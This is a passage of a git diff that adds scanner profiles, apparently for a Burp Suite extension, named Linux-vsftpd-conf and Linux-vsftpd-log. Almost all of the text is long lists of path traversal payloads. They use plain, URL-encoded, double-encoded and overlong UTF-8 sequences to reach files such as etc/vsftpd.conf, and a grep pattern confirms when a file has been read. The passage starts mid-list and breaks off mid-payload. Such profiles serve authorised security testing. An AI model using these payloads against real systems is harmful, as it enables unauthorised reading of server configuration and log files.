"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Example config file" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-vsftpd-conf", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-vsftpd-conf", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/vsftpd.conf", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-vsftpd-log.bb b/profiles/Linux-vsftpd-log.bb index 7896fca..4b596c1 100755 --- a/profiles/Linux-vsftpd-log.bb +++ b/profiles/Linux-vsftpd-log.bb @@ -1 +1,950 @@ -[{"Name":"Linux-vsftpd-log","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%